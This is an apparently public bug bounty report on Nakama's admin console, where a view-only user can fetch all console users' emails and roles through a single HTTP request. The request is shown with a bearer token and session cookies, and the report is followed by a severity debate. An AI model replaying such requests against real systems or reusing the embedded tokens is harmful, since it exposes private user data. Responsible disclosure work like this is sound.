unprivileged user can see user details like email,role etc in heroiclabs/nakama
Reported on
Apr 2nd 2022
Description
view-only user can see user details like email,role etc.
I see there is different type user role in nakama. Based on role user have some limit .But this bug is a privilege escalation bug
Proof of Concept
1. From super admin account add a new user called user-B with view-only permission.
2. Now login into user-B account and here he cant seee other users in his account .
Now user-B sent bellow request which will disclose all available user
GET /v2/console/user HTTP/1.1
Host: 127.0.0.1:7351
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c24iOiJ1c2VyMiIsImVtYSI6ImFnc3lkZ2F1QGFzZGEuY29tIiwicm9sIjo0LCJleHAiOjE2NDkwMDUxNzEsImNraSI6IjRhNmYyYjBhLTgxY2ItNGZiYS05MmUxLTNlZTRhZmRlNDEzYyJ9.WXkLUmcTd7MacFd-s_zMdXlQbbxaxDiQlhv1GeB3wws
Connection: close
Referer: http://127.0.0.1:7351/
Cookie: __profilin=p%3Dt; bagisto_bugbounty_session=eyJpdiI6Im1JaktwamRWQUlkcFJ3bDRnYU1CS2c9PSIsInZhbHVlIjoiS29YSTVPQVkvOCtXcW5tTDhoeDVTcGVOVEQ0RlFWcWtudFVPN2NWaktOOTVjRWRibjBwWVhwdmJFcy9McGgzNHJlUzhyc1NJOXVMMWI2YmNNaWxSRWtKNTFVN1dHL0tWV2EwWmVhd0RVcHQvNVNPcWpqWmNzQVQzMkVaZ0U0R3oiLCJtYWMiOiJjZjdiY2ZlNTY1MTc5MjJiODQ0MzJmNjE3N2Y3YWIyNWU1ZjcyZWY1MzRlMDNhMjlkOTRkZTFiMDRiNWNkOWRhIn0%3D; xbackbone_session=ia673umahu6to3r91ilgc38vmq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Account: TEST2
response
{"users":[{"username":"user2", "email":"agsydgau@asda.com", "role":4}, {"username":"by_admin1", "email":"by_admin@asda.com", "role":4}, {"username":"user1", "email":"user1@localhost.com", "role":3}]}
Impact
User with view-only permiision can see other users email details
Thanks @ranjit-git for this - I've marked the issue as 'Low' due to the nature of the way the Nakama Console works - I.e. someone must trust you originally to create you an account first, and therefore this is not possible as an unknown individual. However, this will be fixed soon.
@maintainer yes , console user who dont have permisison can fetch the details . . i think this should be in medium category . As this bug is privilege escalation bug it must be already a console user .
here i calculated the CVSS score https://ibb.co/3dsVRHc I think you have put every impact to none
sorry wrong image provided above corrent calculated score is https://ibb.co/HgQbYrY
here is score calculated https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N&version=3.1 impact cant be NONE. As this is privilege escalation bug it must have some impact
can you plz update the severity
There is no privilege that's escalated, and more practically there is no difference in the outcome - the 'bad actor' (who must already have an account and be known) cannot do anything further to the system - e.g. cannot delete player accounts, cannot delete Storage records and cannot create/delete console users. If so, please file it differently as they are a bit more severe than what you've so far disclosed. Thanks!
yes agreed that user cant modify the details . But still he can access the information that he is not authorized to do. Privilege escalation is not about only modifying data but also leaking data . Just like many application like github,gitlab,google drive, shopify,facebook page manager,linux os ,windows os etc ,here user may have many role like viewer,editor,admin,developer,root,sudo (all this roles are trusted and added by admin himself ) and some roles are not permitted to see some information . If some how non-permitted role can see information then thats privileged escalation bug . Privilege escalation is not about only modifying data
@maintainer can you plz recheck the severity ? i think CVSS score should be 4.3(low)
@ranjit-git - please respect the assessment of the maintainer. Ultimately the decision lies with the maintainer, and so overly pushing for a certain conclusion around CVSS or the final state of the report will not be accepted.
@admin yes i respect maintainer always . I was just trying to explain the the impact here as huntr look for severity based report now .
This looks to be a duplicate of this: https://www.huntr.dev/bounties/c20a3868-93cc-4d6e-ac60-4a33db6eabc7
@Jamie - apologies looks like I've added my auth-token to the URL above - can you please sanitize and blacklist the token - apologies.
@Mo - I have disabled access with the generic HeroicLabs token. I will redact it from the message and re-enable access with a new token shortly 👍 You will all still be able to access reports directly via your personal accounts.